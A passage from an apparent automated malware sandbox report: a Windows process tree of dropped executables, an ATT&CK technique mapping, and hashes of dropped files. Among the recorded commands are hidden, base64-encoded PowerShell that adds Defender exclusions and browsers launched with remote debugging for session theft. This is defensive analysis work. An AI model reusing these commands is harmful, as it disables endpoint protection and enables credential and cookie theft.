                                      powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:3496
                                    • C:\Program Files\RuntimeApp\0000032364.exe
                                      "C:\Program Files\RuntimeApp\0000032364.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:2132
                                  • C:\Users\Admin\AppData\Local\Temp\10297860101\d3jhg_003.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10297860101\d3jhg_003.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: MapViewOfSection
                                    PID:6588
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                      6⤵
                                        PID:6884
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                          7⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          PID:1560
                                      • C:\Windows\system32\svchost.exe
                                        "C:\Windows\system32\svchost.exe"
                                        6⤵
                                        • Downloads MZ/PE file
                                        • Adds Run key to start application
                                        PID:6936
                                        • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                          "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5692
                                        • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                          "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                          7⤵
                                          • Deletes itself
                                          • Executes dropped EXE
                                          PID:5144
                                    • C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:324
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:7020
                                    • C:\Users\Admin\AppData\Local\Temp\10298830101\RrRYo50.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10298830101\RrRYo50.exe"
                                      5⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      PID:12748
                                      • C:\Users\Admin\AppData\Local\Temp\06a5c50e21\tgvazx.exe
                                        "C:\Users\Admin\AppData\Local\Temp\06a5c50e21\tgvazx.exe"
                                        6⤵
                                          PID:12996
                                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2S4013.exe
                                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2S4013.exe
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5128
                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3W01C.exe
                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3W01C.exe
                                  2⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Downloads MZ/PE file
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Loads dropped DLL
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Checks processor information in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of WriteProcessMemory
                                  PID:4084
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                    3⤵
                                    • Uses browser remote debugging
                                    • Drops file in Windows directory
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of WriteProcessMemory
                                    PID:560
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffe9a5ddcf8,0x7ffe9a5ddd04,0x7ffe9a5ddd10
                                      4⤵
                                        PID:3700
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2024,i,6612407284694865338,15778279337309241051,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2016 /prefetch:2
                                        4⤵
                                          PID:5056
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1660,i,6612407284694865338,15778279337309241051,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2256 /prefetch:3
                                          4⤵
                                            PID:3832
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,6612407284694865338,15778279337309241051,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2576 /prefetch:8
                                            4⤵
                                              PID:6108
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3224,i,6612407284694865338,15778279337309241051,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3264 /prefetch:1
                                              4⤵
                                              • Uses browser remote debugging
                                              PID:3368
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,6612407284694865338,15778279337309241051,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3288 /prefetch:1
                                              4⤵
                                              • Uses browser remote debugging
                                              PID:3644
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,6612407284694865338,15778279337309241051,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4364 /prefetch:2
                                              4⤵
                                              • Uses browser remote debugging
                                              PID:4392
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,6612407284694865338,15778279337309241051,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4772 /prefetch:1
                                              4⤵
                                              • Uses browser remote debugging
                                              PID:1492
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5268,i,6612407284694865338,15778279337309241051,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5312 /prefetch:8
                                              4⤵
                                                PID:4028
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5516,i,6612407284694865338,15778279337309241051,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5472 /prefetch:8
                                                4⤵
                                                  PID:3572
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                3⤵
                                                • Uses browser remote debugging
                                                PID:2692
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
                                                  4⤵
                                                  • Uses browser remote debugging
                                                  • Drops file in Windows directory
                                                  • Enumerates system info in registry
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:5108
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x270,0x7ffe9aa5f208,0x7ffe9aa5f214,0x7ffe9aa5f220
                                                    5⤵
                                                      PID:4008
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2180,i,6464011526537114196,14171487672199608645,262144 --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:2
                                                      5⤵
                                                        PID:2332
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,6464011526537114196,14171487672199608645,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3
                                                        5⤵
                                                          PID:2600
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2496,i,6464011526537114196,14171487672199608645,262144 --variations-seed-version --mojo-platform-channel-handle=2672 /prefetch:8
                                                          5⤵
                                                            PID:5896
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3512,i,6464011526537114196,14171487672199608645,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
                                                            5⤵
                                                            • Uses browser remote debugging
                                                            PID:4848
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,6464011526537114196,14171487672199608645,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
                                                            5⤵
                                                            • Uses browser remote debugging
                                                            PID:5080
                                                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                    1⤵
                                                      PID:5868
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                      1⤵
                                                        PID:5644
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                        1⤵
                                                          PID:1016
                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5504
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1856 -ip 1856
                                                          1⤵
                                                            PID:5384
                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                            1⤵
                                                              PID:2952
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                              1⤵
                                                                PID:4856
                                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                1⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:6032
                                                              • C:\Windows\word.exe
                                                                "C:\Windows\word.exe"
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2840
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAEQALQBtAFAAUABSAGUARgBlAHIAZQBuAEMARQAgAC0ARQBYAEMAbABVAFMAaQBvAE4AUABBAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABBAHQAdAByAGkAYgB1AHQAZQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABEAC0AbQBwAHAAcgBlAEYARQBSAGUATgBDAEUAIAAtAEUAeABjAEwAdQBTAEkATwBuAFAAcgBPAGMAZQBTAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZABcAEEAdAB0AHIAaQBiAHUAdABlAHMALgBlAHgAZQAgAC0AZgBvAHIAYwBFAA==
                                                                1⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:2692

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Reconnaissance

                                                              Resource Development

                                                              Initial Access

                                                              Execution

                                                              Command and Scripting Interpreter

                                                              1
                                                              T1059

                                                              PowerShell

                                                              1
                                                              T1059.001

                                                              Scheduled Task/Job

                                                              1
                                                              T1053

                                                              Scheduled Task

                                                              1
                                                              T1053.005

                                                              Persistence

                                                              Boot or Logon Autostart Execution

                                                              1
                                                              T1547

                                                              Registry Run Keys / Startup Folder

                                                              1
                                                              T1547.001

                                                              Modify Authentication Process

                                                              1
                                                              T1556

                                                              Scheduled Task/Job

                                                              1
                                                              T1053

                                                              Scheduled Task

                                                              1
                                                              T1053.005

                                                              Privilege Escalation

                                                              Boot or Logon Autostart Execution

                                                              1
                                                              T1547

                                                              Registry Run Keys / Startup Folder

                                                              1
                                                              T1547.001

                                                              Scheduled Task/Job

                                                              1
                                                              T1053

                                                              Scheduled Task

                                                              1
                                                              T1053.005

                                                              Defense Evasion

                                                              Hide Artifacts

                                                              1
                                                              T1564

                                                              Hidden Files and Directories

                                                              1
                                                              T1564.001

                                                              Modify Authentication Process

                                                              1
                                                              T1556

                                                              Modify Registry

                                                              1
                                                              T1112

                                                              Virtualization/Sandbox Evasion

                                                              2
                                                              T1497

                                                              Credential Access

                                                              Credentials from Password Stores

                                                              1
                                                              T1555

                                                              Credentials from Web Browsers

                                                              1
                                                              T1555.003

                                                              Modify Authentication Process

                                                              1
                                                              T1556

                                                              Steal Web Session Cookie

                                                              1
                                                              T1539

                                                              Unsecured Credentials

                                                              5
                                                              T1552

                                                              Credentials In Files

                                                              5
                                                              T1552.001

                                                              Discovery

                                                              Browser Information Discovery

                                                              1
                                                              T1217

                                                              Process Discovery

                                                              1
                                                              T1057

                                                              Query Registry

                                                              8
                                                              T1012

                                                              System Information Discovery

                                                              6
                                                              T1082

                                                              System Location Discovery

                                                              1
                                                              T1614

                                                              System Language Discovery

                                                              1
                                                              T1614.001

                                                              Virtualization/Sandbox Evasion

                                                              2
                                                              T1497

                                                              Lateral Movement

                                                              Collection

                                                              Data from Local System

                                                              4
                                                              T1005

                                                              Command and Control

                                                              Exfiltration

                                                              Impact

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\ProgramData\mozglue.dll
                                                                Filesize

                                                                593KB

                                                                MD5

                                                                c8fd9be83bc728cc04beffafc2907fe9

                                                                SHA1

                                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                SHA256

                                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                SHA512

                                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                Download Submit

                                                              • C:\ProgramData\nss3.dll
                                                                Filesize

                                                                2.0MB

                                                                MD5

                                                                1cc453cdf74f31e4d913ff9c10acdde2

                                                                SHA1

                                                                6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                SHA256

                                                                ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                SHA512

                                                                dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                Filesize

                                                                40B

                                                                MD5

                                                                1a32e2a5f5d5c980670db002d6a1fb95

                                                                SHA1

                                                                b1b9296fb5ce6e542a3c58cab190e356a3c3dd98

                                                                SHA256

                                                                39d9ce56424444a8708233a38e9cd2f2c740b9b9adadd418becd4bcb1291c460

                                                                SHA512

                                                                36f5db3c07d48f712c018f14d673251ce16bcb0b7c5d82e43e42c63a2e1f025a23e595ad7e2a590ea9b03a6fcf8d2570c9d3a7f1d758ded804e0ade869e79a35

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2a49a27b-eca1-4c19-9c16-6e67f0f389da.tmp
                                                                Filesize

                                                                1B

                                                                MD5

                                                                5058f1af8388633f609cadb75a75dc9d

                                                                SHA1

                                                                3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                SHA256

                                                                cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                SHA512

                                                                0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                                                Filesize

                                                                649B

                                                                MD5

                                                                16a3e2f58830df82ff64844f6822fa15

                                                                SHA1

                                                                9be4fa71a25cac63b4a9385445c3f4bb50df8941

                                                                SHA256

                                                                2446546a3d3a973e0f3cf26649e1e3e21928ed1a6f22d2b8b371fb273f3ac025

                                                                SHA512

                                                                c1301185ba48629668ea6b239ef5b6c3821a91991ee754a45ca581e40d91ca0d384a0e2993647d93eec3d61000772594ee46a7496073a143cc2cc1ef88f2308d

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                Filesize

                                                                2B

                                                                MD5

                                                                d751713988987e9331980363e24189ce

                                                                SHA1

                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                SHA256

                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                SHA512

                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                                                Filesize

                                                                130KB

                                                                MD5

                                                                4fe5dd9c03ac02b80dd11d89cad9b936

                                                                SHA1

                                                                9779b32402116719a920480278db2bf70faa7c2e

                                                                SHA256

                                                                68481d2a271ea33b78f8c9efeec023cab889fb533d47cf2808a7830dbf236d01

                                                                SHA512

                                                                d1293abc0d1914ec67c74556aeeac95d9d91d08ccf1268d8ecc872143a47c35d142e496482eecd036dd1903c575fc9fc89766487f06310edc57fa625b11f21f5

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                Filesize

                                                                79KB

                                                                MD5

                                                                8431ea2eb485a24bb01f2a28f15607d5

                                                                SHA1

                                                                9c700dd73e3bec88e66862d9ba4f4224cdb80ed3

                                                                SHA256

                                                                8fdb060e59192cfb0c065bd1d82773eb60d8a896ae361a31dd575d3321b78d71

                                                                SHA512

                                                                59a164c783a5af9a7d44e6a10d7db94b1fc0c15e3e72e61cf1ee7c62ad0e1188a5a95d7777d4434236881615048af3a7f1da41ab2322b7eae4c110c83d74d90b

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                Filesize

                                                                280B

                                                                MD5

                                                                aa9afd16e8041e8c80250b50ea6899e4

                                                                SHA1

                                                                a3a698d431952253255c343f2b35f74e73e63088

                                                                SHA256

                                                                2bd7f856d73f78bc3a4de32b447b21babad42c009b19fcebe2f8cdeca2380926

                                                                SHA512

                                                                344de0888df8851d957ca6fab055eb9e2f1aa6d958022c2c30442cd6aad4d158d0a99f8908184abc60fb1e0ccdd3d9395d8c0d37fc317d3700974c3348d4a5ff

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                Filesize

                                                                280B

                                                                MD5

                                                                d4d92c16d30dac4ac2e9e84385d67585

                                                                SHA1

                                                                328dba0e214c6b5c0a1052757e91f5ab615ea530

                                                                SHA256

                                                                986dcceb21266e21f88dbb1728959ba4bc0fcf7596a1dcafb1814a9a23b3b9e8

                                                                SHA512

                                                                834d15f8c3b77bb1539b2d7305edc9d39ce2535265c9860e784fa3a8bdb0b37df08258e552d10dabaf48c4ed1b473a382e61d2b6def21ce668fe0b7ad41256f5

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\69f90508-8154-4dad-a013-a19944dbb265\index-dir\the-real-index
                                                                Filesize

                                                                1KB

                                                                MD5

                                                                1425475e5d89ee6d7720ce5a1185faad

                                                                SHA1

                                                                cb8863f940db7ec91ffc0ce7e41fd164297f0474

                                                                SHA256

                                                                aa61ede906a890e40d69492bf359ffc3bcd1d032d151dbb478463bcc9e8a1e88

                                                                SHA512

                                                                62f6c2fcf59e142a84fbc9bbb8ff0e7c5f3c76cfa9cf0d2b4f806da30c542b1b8d9c18c5b0db25031a1d9a05677b44205d60bed1708cd5c0671f5c70e5656902

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\69f90508-8154-4dad-a013-a19944dbb265\index-dir\the-real-index~RFe586491.TMP
                                                                Filesize

                                                                1KB

                                                                MD5

                                                                0613c8262e1483e18db04a904f5a6735

                                                                SHA1

                                                                1558b5e9a35a205deae7b4d920c179ab2af371fb

                                                                SHA256

                                                                2ef5a19071701f755f14603fecb334c0958b806ebca2f6fb3bc30d0c4d811e57

                                                                SHA512

                                                                f50bb1260cd173c5d172085b33a3cee76ee94bb2668b76f5281f95cdcd6465e3c0f72a8f242b19c9b7d5c185b96a37b98a9eea649ed65ccc20ca6c5dbda1b6da

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data
                                                                Filesize

                                                                228KB

                                                                MD5

                                                                80fc306f40b4c3c7fca012a9427b17b1

                                                                SHA1

                                                                671cc8866b5188a689df5fd6400cff7003893234

                                                                SHA256

                                                                0f5013df25dee56327eaa08e432b279d2f2e7aa116891c37b3c96cfec41fa327

                                                                SHA512

                                                                f5a3039bd62d40c45e578a322b1582ec0b8b030a4896c8e7488576103a1fd1f96008085469dbedd035832b6ed67a43bba10bea478bcc31aabdfde4df8f57e132

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\f03d8801-b477-4dff-b502-41fa5d169c74.tmp
                                                                Filesize

                                                                41KB

                                                                MD5

                                                                56873bad6ef0673ff6c92df6a241d432

                                                                SHA1

